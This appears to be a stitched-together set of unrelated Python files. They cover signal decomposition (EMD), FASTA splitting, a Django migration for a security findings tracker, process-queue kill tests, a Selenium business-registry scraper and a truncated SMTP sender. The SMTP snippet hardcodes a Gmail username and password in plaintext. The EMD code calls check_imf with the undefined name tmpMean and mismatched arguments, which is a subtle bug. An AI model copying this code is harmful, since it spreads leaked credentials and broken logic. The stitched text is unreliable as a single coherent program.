if S[0] < S[indmax[0]]:
lmax = indmax[0:min(endMax,nbsym+0)][::-1]
lmin = indmin[1:min(endMin,nbsym+1)][::-1]
lsym = indmin[0]
else:
lmax = np.append(indmax[0:min(endMax,nbsym-1)][::-1],0)
lmin = indmin[0:min(endMin,nbsym)][::-1]
lsym = 0
####################################
# Right bound - mirror nbsym points to the right
if indmax[-1] < indmin[-1]:
if S[-1] < S[indmax[-1]]:
rmax = indmax[max(endMax-nbsym,0):][::-1]
rmin = indmin[max(endMin-nbsym-1,0):-1][::-1]
rsym = indmin[-1]
else:
rmax = np.append(indmax[max(endMax-nbsym+1,0):], len(S)-1)[::-1]
rmin = indmin[max(endMin-nbsym,0):][::-1]
rsym = len(S)-1
else:
if S[-1] > S[indmin[-1]]:
rmax = indmax[max(endMax-nbsym-1,0):-1][::-1]
rmin = indmin[max(endMin-nbsym,0):][::-1]
rsym = indmax[-1]
else:
rmax = indmax[max(endMax-nbsym,0):][::-1]
rmin = np.append(indmin[max(endMin-nbsym+1,0):], len(S)-1)[::-1]
rsym = len(S)-1
# In case any array missing
if not lmin.size: lmin = indmin
if not rmin.size: rmin = indmin
if not lmax.size: lmax = indmax
if not rmax.size: rmax = indmax
# Mirror points
tlmin = 2*T[lsym]-T[lmin]
tlmax = 2*T[lsym]-T[lmax]
trmin = 2*T[rsym]-T[rmin]
trmax = 2*T[rsym]-T[rmax]
# If mirrored points are not outside passed time range.
if tlmin[0] > T[0] or tlmax[0] > T[0]:
if lsym == indmax[0]:
lmax = indmax[0:min(endMax,nbsym)][::-1]
else:
lmin = indmin[0:min(endMin,nbsym)][::-1]
if lsym == 0:
raise Exception('Left edge BUG')
lsym = 0
tlmin = 2*T[lsym]-T[lmin]
tlmax = 2*T[lsym]-T[lmax]
if trmin[-1] < T[-1] or trmax[-1] < T[-1]:
if rsym == indmax[-1]:
rmax = indmax[max(endMax-nbsym,0):][::-1]
else:
rmin = indmin[max(endMin-nbsym,0):][::-1]
if rsym == len(S)-1:
raise Exception('Right edge BUG')
rsym = len(S)-1
trmin = 2*T[rsym]-T[rmin]
trmax = 2*T[rsym]-T[rmax]
zlmax = S[lmax]
zlmin = S[lmin]
zrmax = S[rmax]
zrmin = S[rmin]
tmin = np.append(tlmin, np.append(T[indmin], trmin))
tmax = np.append(tlmax, np.append(T[indmax], trmax))
zmin = np.append(zlmin, np.append(S[indmin], zrmin))
zmax = np.append(zlmax, np.append(S[indmax], zrmax))
maxExtrema = np.array([tmax, zmax])
minExtrema = np.array([tmin, zmin])
if maxExtrema.dtype != self.DTYPE: self.logger.error('maxExtrema.dtype: '+str(maxExtrema.dtype))
# Make double sure, that each extremum is significant
maxExtrema = np.delete(maxExtrema, np.where(maxExtrema[0,1:]==maxExtrema[0,:-1]),axis=1)
minExtrema = np.delete(minExtrema, np.where(minExtrema[0,1:]==minExtrema[0,:-1]),axis=1)
return maxExtrema, minExtrema
def spline_points(self, T, extrema):
"""
Constructs spline over given points.
Input:
---------
T: Time array.
extrema: Position (1st row) and values (2nd row) of points.
splineKind: Type of spline.
Output:
---------
T: Poistion array.
spline: Spline over the given points.
"""
kind = self.splineKind.lower()
t = T[np.r_[T>=extrema[0,0]] & np.r_[T<=extrema[0,-1]]]
if t.dtype != self.DTYPE: self.logger.error('t.dtype: '+str(t.dtype))
if extrema.dtype != self.DTYPE: self.logger.error('extrema.dtype: '+str(extrema.dtype))
if kind == "akima":
return t, akima(extrema[0], extrema[1], t)
elif kind == 'cubic':
if extrema.shape[1]>3:
return t, interp1d(extrema[0], extrema[1], kind=kind)(t)
else:
return cubic_spline_3pts(extrema[0], extrema[1], t)
elif kind in ['slinear', 'quadratic', 'linear']:
return T, interp1d(extrema[0], extrema[1], kind=kind)(t).astype(self.DTYPE)
else:
raise ValueError("No such interpolation method!")
def not_duplicate(self, s):
idx = [0]
for i in range(1,len(s)-1):
if (s[i] == s[i+1] and s[i] == s[i-1]):
pass
else: idx.append(i)
idx.append(len(s)-1)
return idx
def find_extrema(self, t, s):
if self.extrema_detection=="parabol":
return self._find_extrema_parabol(t, s)
elif self.extrema_detection=="simple":
return self._find_extrema_simple(t, s)
else:
msg = "Incorrect extrema detection type. Please try: "
msg+= "'simple' or 'parabol'."
raise ValueError(msg)
def _find_extrema_parabol(self, t, s):
"""
Estimates position and value of extrema by parabolic
interpolation based on three consecutive points.
Input:
------------
t - time array;
s - signal;
Output:
------------
localMaxPos - position of local maxima;
localMaxVal - values of local maxima;
localMinPos - position of local minima;
localMinVal - values of local minima;
"""
# Finds indexes of zero-crossings
s1, s2 = s[:-1], s[1:]
indzer = np.nonzero(s1*s2<0)[0]
if np.any(s == 0):
iz = np.nonzero(s==0)[0]
indz = []
if np.any(np.diff(iz)==1):
zer = s == 0
dz = np.diff(np.append(np.append(0, zer), 0))
debz = np.nonzero(dz == 1)[0]
finz = np.nonzero(dz == -1)[0]-1
indz = np.round((debz+finz)/2.)
else:
indz = iz
indzer = np.sort(np.append(indzer, indz))
dt = float(t[1]-t[0])
scale = 2.*dt*dt
idx = self.not_duplicate(s)
t = t[idx]
s = s[idx]
# p - previous
# 0 - current
# n - next
tp, t0, tn = t[:-2], t[1:-1], t[2:]
sp, s0, sn = s[:-2], s[1:-1], s[2:]
#~ a = sn + sp - 2*s0
#~ b = 2*(tn+tp)*s0 - ((tn+t0)*sp+(t0+tp)*sn)
#~ c = sp*t0*tn -2*tp*s0*tn + tp*t0*sn
tntp, t0tn, tpt0 = tn-tp, t0-tn, tp-t0
#~ scale = tp*tn*tn + tp*tp*t0 + t0*t0*tn - (tp*tp*tn + tp*t0*t0 + t0*tn*tn)
scale = -tntp*tpt0*t0tn
#~ a = t0tn*sp + tntp*s0 + tpt0*sn
#~ b = (s0-sn)*tp**2 + (sn-sp)*t0**2 + (sp-s0)*tn**2
#~ c = t0*tn*t0tn*sp + tn*tp*tntp*s0 + tp*t0*tpt0*sn
#~ a = tn*(s0-sp) + t0*(sp-sn) + tp*(sn-s0)
a = tn*s0 + t0*sp + tp*sn - (tn*sp + t0*sn + tp*s0)
b = (s0-sn)*tp**2 + (sn-sp)*t0**2 + (sp-s0)*tn**2
c = t0*tn*t0tn*sp + tn*tp*tntp*s0 + tp*t0*tpt0*sn
a = a/scale
b = b/scale
c = c/scale
tVertex = np.zeros(a.size, dtype=self.DTYPE)
# Extremum only if a!=0
nonZeroA = a!=0
tVertex[nonZeroA] = -0.5*b[nonZeroA]/a[nonZeroA]
# If a==0 than it's a straight line, thus no extremum
zeroA = a==0
tVertex[zeroA] = tn[zeroA]
idx = np.r_[tVertex<(t0 + 0.5*(tn-t0))] & np.r_[tVertex>=(t0-0.5*(t0-tp))]
I = []
for i in np.arange(len(idx))[idx]:#[:-1]:
if i > 2 and (i < len(t0)-2):
if sp[i-1] >= s0[i-1] and sp[i] >= s0[i] and s0[i] >= sn[i] and s0[i+1] >= sn[i+1]:
pass
elif sp[i-1] <= s0[i-1] and sp[i] <= s0[i] and s0[i] <= sn[i] and s0[i+1] <= sn[i+1]:
pass
else:
I.append(i)
else:
I.append(i)
idx = np.array(I)
a, b, c = a[idx], b[idx], c[idx]
tVertex = tVertex[idx]
T, S = t0[idx], s0[idx]
#~ sVertex = a*(tVertex+T)*(tVertex-T) + b*(tVertex-T) + S
sVertex = a*tVertex*tVertex + b*tVertex + c
localMaxPos, localMaxVal = tVertex[a<0], sVertex[a<0]
localMinPos, localMinVal = tVertex[a>0], sVertex[a>0]
return localMaxPos, localMaxVal, localMinPos, localMinVal, indzer
def _find_extrema_simple(self, t, s):
"""
Finds extrema and zero-crossings.
Input:
---------
S: Signal.
T: Time array.
Output:
---------
localMaxPos: Time positions of maxima.
localMaxVal: Values of signal at localMaxPos positions.
localMinPos: Time positions of minima.
localMinVal: Values of signal at localMinPos positions.
indzer: Indexes of zero crossings.
"""
# Finds indexes of zero-crossings
s1, s2 = s[:-1], s[1:]
indzer = np.nonzero(s1*s2<0)[0]
if np.any(s == 0):
iz = np.nonzero( s==0 )[0]
indz = []
if np.any(np.diff(iz)==1):
zer = s == 0
dz = np.diff(np.append(np.append(0, zer), 0))
debz = np.nonzero(dz == 1)[0]
finz = np.nonzero(dz == -1)[0]-1
indz = np.round((debz+finz)/2.)
else:
indz = iz
indzer = np.sort(np.append(indzer, indz))
# Finds local extrema
d = np.diff(s)
d1, d2 = d[:-1], d[1:]
indmin = np.nonzero(np.r_[d1*d2<0] & np.r_[d1<0])[0]+1
indmax = np.nonzero(np.r_[d1*d2<0] & np.r_[d1>0])[0]+1
# When two or more points have the same value
if np.any(d==0):
imax, imin = [], []
bad = (d==0)
dd = np.diff(np.append(np.append(0, bad), 0))
debs = np.nonzero(dd == 1)[0]
fins = np.nonzero(dd == -1)[0]
if debs[0] == 1:
if len(debs) > 1:
debs, fins = debs[1:], fins[1:]
else:
debs, fins = [], []
if len(debs) > 0:
if fins[-1] == len(s)-1:
if len(debs) > 1:
debs, fins = debs[:-1], fins[:-1]
else:
debs, fins = [], []
lc = len(debs)
if lc > 0:
for k in range(lc):
if d[debs[k]-1] > 0:
if d[fins[k]] < 0:
imax.append(np.round((fins[k]+debs[k])/2.))
else:
if d[fins[k]] > 0:
imin.append(np.round((fins[k]+debs[k])/2.))
if len(imax) > 0:
indmax = indmax.tolist()
for x in imax: indmax.append(int(x))
indmax.sort()
if len(imin) > 0:
indmin = indmin.tolist()
for x in imin: indmin.append(int(x))
indmin.sort()
localMaxPos = t[indmax]
localMaxVal = s[indmax]
localMinPos = t[indmin]
localMinVal = s[indmin]
return localMaxPos, localMaxVal, localMinPos, localMinVal, indzer
def findExtrema(self, t, s):
"""
Estimates position and value of extrema by parabolic
interpolation based on three consecutive points.
Input:
------------
t - time array;
s - signal;
Output:
------------
localMaxPos - position of local maxima;
localMaxVal - values of local maxima;
localMinPos - position of local minima;
localMinVal - values of local minima;
"""
# Finds indexes of zero-crossings
s1, s2 = s[:-1], s[1:]
indzer = np.nonzero(s1*s2<0)[0]
if np.any(s == 0):
iz = np.nonzero(s==0)[0]
indz = []
if np.any(np.diff(iz)==1):
zer = s == 0
dz = np.diff(np.append(np.append(0, zer), 0))
debz = np.nonzero(dz == 1)[0]
finz = np.nonzero(dz == -1)[0]-1
indz = np.round((debz+finz)/2.)
else:
indz = iz
indzer = np.sort(np.append(indzer, indz))
d = np.append(np.diff(s), 1)
t = t[d!=0]
s = s[d!=0]
dt = t[1]-t[0]
tVertex = np.zeros(len(t)-2, dtype=self.DTYPE)
# p - previous
# 0 - current
# n - next
tp, t0, tn = t[:-2], t[1:-1], t[2:]
sp, s0, sn = s[:-2], s[1:-1], s[2:]
a = sn + sp - 2*s0
#~ b = 2*(tn+tp)*s0 - ((tn+t0)*sp+(t0+tp)*sn)
b = dt*(sn-sp) + 2*t0*(2*s0 - (sn+sp))
# Vertex positions
idx = a!=0
tVertex[idx] = -0.5*b[idx]/a[idx]
# Extract only vertices in considered range
idx = np.r_[tVertex<=tn-0.5*dt] & np.r_[tVertex>tp+0.5*dt]
a, b = a[idx], b[idx]
a, b = a/(2.*dt*dt), b/(2.*dt*dt)
tVertex = tVertex[idx]
T, S = t0[idx], s0[idx]
# Estimates value of vertex - c = S - a T^2 - b T
sVertex = a*(tVertex+T)*(tVertex-T) + b*(tVertex-T) + S
#~ sVertex = a*tVertex*tVertex + b*tVertex + c
localMaxPos, localMaxVal = tVertex[a<0], sVertex[a<0]
localMinPos, localMinVal = tVertex[a>0], sVertex[a>0]
return localMaxPos, localMaxVal, localMinPos, localMinVal, indzer
def end_condition(self, Res, IMF):
# When to stop EMD
tmp = Res.copy()
for imfNo in list(IMF.keys()):
tmp -= IMF[imfNo]
#~ # Power is enough
#~ if np.log10(np.abs(tmp).sum()/np.abs(Res).sum()) < powerThreshold:
#~ self.logger.info("FINISHED -- POWER RATIO")
#~ return True
if np.max(tmp) - np.min(tmp) < self.rangeThreshold:
self.logger.info("FINISHED -- RANGE")
return True
if np.sum(np.abs(tmp)) < self.totalPowerThreshold:
self.logger.info("FINISHED -- SUM POWER")
return True
def check_imf(self, imfNew, imfOld, eMax, eMin, mean):
"""
Huang criteria. Similar to Cauchy convergence test.
SD stands for Sum of the Difference.
"""
# local max are >0 and local min are <0
if np.any(eMax[1]<0) or np.any(eMin[1]>0):
return False
# Convergence
if np.sum(imfNew**2) < 1e-10: return False
std = np.sum( ((imfNew-imfOld)/imfNew)**2 )
scaledVar = np.sum((imfNew-imfOld)**2)/(max(imfOld)-min(imfOld))
if scaledVar < self.scaledVarThreshold:
self.logger.info("Scaled variance -- PASSED")
return True
elif std < self.stdThreshold:
self.logger.info("Standard deviation -- PASSED")
return True
else:
return False
def _common_dtype(self, x, y):
dtype = np.find_common_type([x.dtype, y.dtype], [])
if x.dtype != dtype: x = x.astype(dtype)
if y.dtype != dtype: y = y.astype(dtype)
return x, y
def emd(self, S, T=None, maxImf=None):
"""
Performs Empirical Mode Decomposition on signal S.
The decomposition is limited to maxImf imf. No limitation as default.
Returns IMF functions in numpy array format.
Input:
---------
S: Signal.
T: Positions of signal. If none passed numpy arange is created.
maxImf: IMF number to which decomposition should be performed.
As a default, all IMFs are returned.
Output:
---------
IMF: Signal IMFs in numpy array form.
"""
if T is None: T = np.arange(len(S), dtype=S.dtype)
if maxImf is None: maxImf = -1
# Make sure same types are dealt
S, T = self._common_dtype(S, T)
self.DTYPE = S.dtype
Res = S.astype(self.DTYPE)
scale = (max(Res) - min(Res))/float(self.scaleFactor)
Res, scaledS = Res/scale, S/scale
imf = np.zeros(len(S), dtype=self.DTYPE)
imfOld = Res.copy()
N = len(S)
if Res.dtype!=self.DTYPE: self.logger.error('Res.dtype: '+str(Res.dtype))
if scaledS.dtype!=self.DTYPE: self.logger.error('scaledS.dtype: '+str(scaledS.dtype))
if imf.dtype!=self.DTYPE: self.logger.error('imf.dtype: '+str(imf.dtype))
if imfOld.dtype!=self.DTYPE: self.logger.error('imfOld.dtype: '+str(imfOld.dtype))
if T.dtype!=self.DTYPE: self.logger.error('T.dtype: '+str(T.dtype))
if S.shape != T.shape:
info = "Time array should be the same size as signal."
raise ValueError(info)
# Create arrays
IMF = {} # Dict for imfs signals
imfNo = 0
notFinish = True
corRes = np.zeros(N, dtype=self.DTYPE)
y = np.zeros(N, dtype=self.DTYPE)
t = np.zeros(N, dtype=self.DTYPE)
oldMean = np.zeros(N, dtype=self.DTYPE)
meanEnv = np.zeros(N, dtype=self.DTYPE)
while(notFinish):
self.logger.debug('IMF -- '+str(imfNo))
yRes = (-(imf+corRes)).astype(self.DTYPE)
tRes = (Res + yRes).astype(self.DTYPE)
cor = (tRes - Res) - yRes
Res = tRes
#~ Res -= imf
imf = Res.copy()
if imf.dtype!=self.DTYPE: self.logger.error('imf.dtype: '+str(imf.dtype))
mean = np.zeros(len(S), dtype=self.DTYPE)
sumEnv = np.zeros(len(S), dtype=self.DTYPE)
corEnv = np.zeros(len(S), dtype=self.DTYPE)
# Counters
n = 0 # All iterations for current imf.
n_h = 0 # counts when |#zero - #ext| <=1
# Start on-screen displaying
if self.PLOT and self.INTERACTIVE:
plt.ion()
while(n<self.MAX_ITERATION):
n += 1
self.logger.debug("Iteration: "+str(n))
maxPos, maxVal, minPos, minVal, indzer = self.find_extrema(T, imf)
extNo = len(minPos)+len(maxPos)
nzm = len(indzer)
if extNo > 2:
# If scale tiny it might be noise, thus no need for
# further decomposition
if np.max(imf) - np.min(imf) < 1e-4:
msg = "Breaking decomposition as value range too small"
msg+= "\ndS: "+str(np.max(imf) - np.min(imf))
self.logger.info(msg)
notFinish = False
break
# Plotting. Either into file, or on-screen display.
if n>1 and self.PLOT:
plt.clf()
plt.plot(T, imf*scale, 'g')
plt.plot(T, maxEnv*scale, 'b')
plt.plot(T, minEnv*scale, 'r')
plt.plot(T, mean*scale, 'k--')
plt.title("imf{}_{:02}".format(imfNo, n-1))
if self.INTERACTIVE:
plt.draw()
else:
fName = "imf{}_{:02}".format(imfNo, n-1)
plt.savefig(os.path.join(self.plotPath,fName))
if Res.dtype!=self.DTYPE: self.logger.error('Res.dtype: '+str(Res.dtype))
if mean.dtype!=self.DTYPE: self.logger.error('mean.dtype: '+str(mean.dtype))
imfOld = imf.copy()
imf = Res - self.reduceScale*mean
maxEnv, minEnv, eMax, eMin = self.extract_max_min_spline(T, imf)
if type(maxEnv) == type(-1):
notFinish = True
break
y = 0.5*maxEnv - cor
t = sumEnv + y
cor = (t - sumEnv) - y
sumEnv = t
y = 0.5*minEnv - cor
t = sumEnv + y
cor = (t - sumEnv) - y
sumEnv = t
oldMean = mean.copy()
mean = sumEnv
# Fix number of iterations
if self.FIXE:
if n>=self.FIXE+1: break
# Fix number of iterations after number of zero-crossings
# and extrema differ at most by one.
elif self.FIXE_H:
maxPos, maxVal, minPos, minVal, indZer = self.find_extrema(T, imf)
extNo = len(maxPos)+len(minPos)
nzm = len(indZer)
if n == 1: continue
if abs(extNo-nzm)>1: n_h = 0
else: n_h += 1
#if np.all(maxVal>0) and np.all(minVal<0):
# n_h += 1
#else:
# n_h = 0
# STOP
if n_h >= self.FIXE_H: break
# Stops after default stopping criteria are meet.
else:
maxPos, maxVal, minPos, minVal, indZer = self.find_extrema(T, imf)
extNo = len(maxPos) + len(minPos)
nzm = len(indZer)
f1 = self.check_imf(imf, maxEnv, minEnv, tmpMean, extNo)
#f2 = np.all(maxVal>0) and np.all(minVal<0)
f2 = abs(extNo - nzm)<2
# STOP
if f1 and f2: break
else:
notFinish = False
break
IMF[imfNo] = imf.copy() - cor
imfNo += 1
if self.end_condition(scaledS, IMF) or imfNo==maxImf:
notFinish = False
break
#~ # Saving residuum
#~ Res -= imf
#~ #Res = scaledS - np.sum([IMF[i] for i in range(imfNo)],axis=0)
#~ IMF[imfNo] = Res
#~ imfNo += 1
for key in list(IMF.keys()):
IMF[key] *= scale
nIMF = np.array([IMF[k] for k in sorted(IMF.keys())])
return nIMF
###################################################
## Beginning of program
if __name__ == "__main__":
import pylab as plt
# Logging options
logging.basicConfig(level=logging.DEBUG)
# EMD options
maxImf = -1
DTYPE = np.float64
# Signal options
N = 400
tMin, tMax = 0, 2*np.pi
T = np.linspace(tMin, tMax, N, dtype=DTYPE)
S = np.sin(20*T*(1+0.2*T)) + T**2 + np.sin(13*T)
S = S.astype(DTYPE)
print("Input S.dtype: "+str(S.dtype))
# Prepare and run EMD
emd = EMD()
emd.PLOT = 0
emd.FIXE_H = 5
emd.nbsym = 2
emd.splineKind = 'cubic'
emd.DTYPE = DTYPE
nIMF = emd.emd(S, T, maxImf)
imfNo = nIMF.shape[0]
# Plot results
c = 1
r = np.ceil((imfNo+1)/c)
plt.ioff()
plt.subplot(r,c,1)
plt.plot(T, S, 'r')
plt.xlim((tMin, tMax))
plt.title("Original signal")
for num in range(imfNo):
plt.subplot(r,c,num+2)
plt.plot(T, nIMF[num],'g')
plt.xlim((tMin, tMax))
plt.ylabel("Imf "+str(num+1))
plt.tight_layout()
plt.show()
|
#!/usr/bin/env python
# split_fa.py
"""
Split a directory full of fasta files into files with equal numbers of
sequences per file
"""
import argparse
import os
from Bio import SeqIO
import glob
def split_fasta(infile, outdir, files_wanted, total_sequences, file_counter):
"""
Split fasta file into x number of files
"""
seq_per_file = (total_sequences / files_wanted) + 1
current_seq_count = 0
total_seq_count = 0
outfile = open(outdir + '/query' + str(file_counter), 'w')
for record in SeqIO.parse(infile, 'fasta'):
current_seq_count += 1
total_seq_count += 1
SeqIO.write(record, outfile, 'fasta')
if total_seq_count == total_sequences:
break
if current_seq_count == seq_per_file:
current_seq_count = 0
file_counter += 1
outfile.close()
outfile = open(outdir + '/query' + str(file_counter), 'w')
return file_counter
def main():
parser = argparse.ArgumentParser(description='Split fasta file into \
smaller pieces')
parser.add_argument('indir', help='Input directory')
parser.add_argument('outdir', help='Output directory')
parser.add_argument('-j', type=int, help='Number of jobs')
args = parser.parse_args()
indir = args.indir
outdir = args.outdir
if not os.path.exists(outdir):
os.mkdir(outdir)
if args.j:
jobs = args.j
else:
jobs = 500
file_counter = 1
for f in glob.glob(indir + '/*.fa'):
total_sequences = 0
infile = open(f, 'rU')
for line in infile:
if line.startswith('>'):
total_sequences += 1
print total_sequences
infile.seek(0)
file_counter = split_fasta(infile, outdir, jobs,
total_sequences, file_counter)
print file_counter
infile.close()
if __name__ == "__main__":
main()
|
# Generated by Django 2.2.5 on 2019-09-09 09:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Finding',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('description', models.TextField(null=True)),
('pluginID', models.IntegerField(null=True)),
('checked', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Host',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ip', models.CharField(max_length=30)),
('fqdn', models.CharField(max_length=255, null=True)),
('mac', models.CharField(max_length=30, null=True)),
('os', models.CharField(max_length=100, null=True)),
],
),
migrations.CreateModel(
name='Import',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('running', models.IntegerField(default=0)),
('completed', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='ProofOfConcept',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('info', models.CharField(max_length=30)),
('poc', models.TextField(blank=True, null=True)),
('imported', models.IntegerField(default=0)),
('finding', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='api.Finding')),
],
),
migrations.CreateModel(
name='Service',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('port', models.IntegerField(default=0)),
('protocol', models.CharField(max_length=10)),
('haspoc', models.IntegerField(default=0)),
('falsepositive', models.IntegerField(default=0)),
('findings', models.ManyToManyField(through='api.ProofOfConcept', to='api.Finding')),
('host', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='services', to='api.Host')),
],
),
migrations.CreateModel(
name='Tool',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('commandstring', models.CharField(max_length=255)),
('expected_good', models.TextField(blank=True, null=True)),
('expected_bad', models.TextField(blank=True, null=True)),
('timeout', models.IntegerField(default=60)),
('threads', models.IntegerField(blank=True, default=5, null=True)),
],
),
migrations.CreateModel(
name='Task',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('starttime', models.DateTimeField(auto_now_add=True)),
('threads', models.IntegerField(default=5)),
('running', models.IntegerField(default=0)),
('completed', models.IntegerField(default=0)),
('errormessage', models.TextField(blank=True, null=True)),
('targets_completed', models.IntegerField(default=0)),
('services', models.ManyToManyField(to='api.Service')),
('tool', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Tool')),
],
),
migrations.AddField(
model_name='proofofconcept',
name='service',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='api.Service'),
),
]
|
import time
import pytest
from test.helper import (
execute_add,
wait_for_process,
wait_for_processes,
command_factory,
)
@pytest.mark.parametrize('signal',
['sigint', 'SIGINT', 'int', 'INT', '2',
'sigterm', 'SIGTERM', 'term', 'TERM', '15',
'sigkill', 'SIGKILL', 'kill', 'KILL', '9']
)
def test_kill(daemon_setup, signal):
"""Kill a running process."""
execute_add('sleep 60')
command_factory('kill')({'signal': signal})
status = wait_for_process(0)
assert status['status'] == 'paused'
assert status['data'][0]['status'] == 'failed'
@pytest.mark.parametrize('signal', ['sigterm', 'sigint', 'sigkill'])
def test_kill_all(daemon_setup, multiple_setup, signal):
"""Kill all running processes."""
# Setup multiple processes test case
multiple_setup(
max_processes=3,
processes=4,
sleep_time=60,
)
command_factory('kill')({'signal': signal})
status = wait_for_processes([0, 1, 2])
assert status['status'] == 'paused'
assert status['data'][0]['status'] == 'failed'
assert status['data'][1]['status'] == 'failed'
assert status['data'][2]['status'] == 'failed'
assert status['data'][3]['status'] == 'queued'
@pytest.mark.parametrize('signal', ['sigterm', 'sigint', 'sigkill'])
def test_kill_multiple(daemon_setup, multiple_setup, signal):
"""Kill multiple running processes."""
# Setup multiple processes test case
multiple_setup(
max_processes=3,
processes=4,
sleep_time=60,
)
# Only kill two of three running processes and wait for them being processed.
command_factory('kill')({'keys': [0, 2], 'signal': signal})
status = wait_for_processes([0, 2])
# Two should be failed, and two should be running
assert status['status'] == 'running'
assert status['data'][0]['status'] == 'failed'
assert status['data'][1]['status'] == 'running'
assert status['data'][2]['status'] == 'failed'
assert status['data'][3]['status'] == 'running'
def test_kill_single(daemon_setup):
"""Kill a running process and check if it finishes as failed."""
# We need to add some bash syntax with "&&" otherwise python won't spawn a
# shell parent process. But we need this for debugging.
execute_add('sleep 60 && ls')
# Unfortunately this is necessary as the shell parent process needs some time to spawn it's children
time.sleep(1)
# Kill the children of the parent process
command_factory('kill')({'keys': [0], 'signal': 'sigkill'})
command_factory('status')()
status = wait_for_process(0)
assert status['status'] == 'running'
assert status['data'][0]['status'] == 'failed'
def test_kill_single_with_multiple_commands(daemon_setup):
"""Assure that the signal will be only send to the shells child processes."""
# Once the first sleep finishes the second sleep process will be spawned.
# By this we can assure that the signal is only sent to the child processes.
execute_add('sleep 60 ; sleep 60')
# Unfortunately this is necessary as the shell parent process needs some time to spawn it's children
time.sleep(1)
# Kill the children of the parent process
command_factory('kill')({'keys': [0], 'signal': 'sigkill'})
# Give the shell process some time to clean the old process and spawn the new one.
time.sleep(1)
# Assert that the queue entry is still running
status = command_factory('status')()
assert status['status'] == 'running'
assert status['data'][0]['status'] == 'running'
def test_kill_shell_of_single_with_multiple_commands(daemon_setup):
"""Assure that the signal will be sent to the shell process with '-a' provided."""
# Once the first sleep finishes the second sleep process will be spawned.
# By this we can assure that the signal is only sent to the child processes.
execute_add('sleep 60 ; sleep 60')
# Unfortunately this is necessary as the shell parent process needs some time to spawn it's children
time.sleep(1)
# Kill the shell process as well as the child processes.
command_factory('kill')({'keys': [0], 'signal': 'sigkill', 'all': True})
# Give the shell process some time to die and pueue to clean up the mess.
status = wait_for_process(0)
# Assert that the queue entry is finished and failed
assert status['status'] == 'running'
assert status['data'][0]['status'] == 'failed'
|
# 本程式用於爬於第一次搜尋時,不慎抓錯的餐館
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import urllib.request
from bs4 import BeautifulSoup
import urllib.parse
from selenium.webdriver.chrome.options import Options
list_shop = []
dict_data = dict()
ffile = input()
ffile = open(ffile, "r", encoding="utf8")
sfile = input()
sfile = open(sfile, "a", encoding="utf8")
for line in ffile:
shop = line.strip("\n")
shop = line.strip(" ")
list_shop.append(shop)
def Xclicker(button):
driver.implicitly_wait(10)
close = driver.find_element_by_xpath(button)
close.click()
def idclicker(button):
driver.implicitly_wait(10)
close = driver.find_element_by_css_selector(button)
close.click()
# 爬蟲開始
for shop in list_shop:
time.sleep(2)
chrome_driver_path = r"C:\Users\mikes\Desktop\python\crawler.practice\chromedriver\chromedriver.exe"
options = webdriver.ChromeOptions()
options.add_argument("headless")
driver = webdriver.Chrome(chrome_driver_path, options=options)
url = "https://findbiz.nat.gov.tw/fts/query/QueryList/queryList.do"
url = driver.get(url)
# 勾選各種項目
Xclicker(
'/html/body/div[2]/form/div[1]/div[1]/div/div[4]/div[1]/div/div/div/input[1]')
# 依店家名稱
Xclicker(
'/html/body/div[2]/form/div[1]/div[1]/div/div[4]/div[2]/div/div/div/input[5]')
# 勾選商業選項
Xclicker(
'/html/body/div[2]/form/div[1]/div[1]/div/div[4]/div[2]/div/div/div/input[1]')
# 取消公司選項
idclicker("#isAliveY")
# 勾選現存店家
Xclicker('//*[@id="advSearchIsOff"]/a')
# 進階搜尋
Xclicker('//*[@id="roundedBox"]/div[1]/div/label[8]')
Xclicker('//*[@id="busiItemMain"]')
Xclicker('//*[@id="busiItemMain"]/option[7]')
Xclicker('//*[@id="busiItemSub"]')
Xclicker('//*[@id="busiItemSub"]/option[192]')
keyword = driver.find_element_by_css_selector("#qryCond")
driver.implicitly_wait(10)
keyword.send_keys(shop) # 輸入店名
# idclicker("#qryBtn") # 查詢開始
time.sleep(1)
driver.find_element_by_xpath(
'/html/body/div[2]/form/div[3]/div/div/div/div/div[2]/div/div[1]/a').click()
# driver.find_element_by_xpath(
# '//*[@id="eslist-table"]/tbody/tr[1]/td[4]/a').click()
# 地址抓取
addr = driver.find_element_by_xpath(
'//*[@id="tabBusmContent"]/div/table/tbody/tr[8]/td[2]')
if "臺中市" not in addr.text:
addr = driver.find_element_by_xpath(
'//*[@id="tabBusmContent"]/div/table/tbody/tr[9]/td[2]')
if "臺中市" not in addr.text:
addr = driver.find_element_by_xpath(
'//*[@id="tabBusmContent"]/div/table/tbody/tr[10]/td[2]')
if "臺中市" not in addr.text:
addr = driver.find_element_by_xpath(
'//*[@id="tabBusmContent"]/div/table/tbody/tr[11]/td[2]')
addr = addr.text.strip(" 電子地圖")
dict_data[shop] = addr
sfile.writelines(shop+" ")
sfile.writelines(addr+"\n")
shop = shop.strip("\n")
print(shop, addr)
driver.close()
print(dict_data)
|
import smtplib
def sendemail(toaddr,fromaddr,fromname,subject,msg):
message = """\nFrom: {} {}
\nTo: {}
\nSubject: {}
\n{}
"""
messagetosend = message.format(
fromaddr,
fromname,
toaddr,
subject,
msg)
# Credentials (if needed)
username = 'kenielpeart784@gmail.com'
password = 'psewxinzxcasdsjn'
# The actual mail send
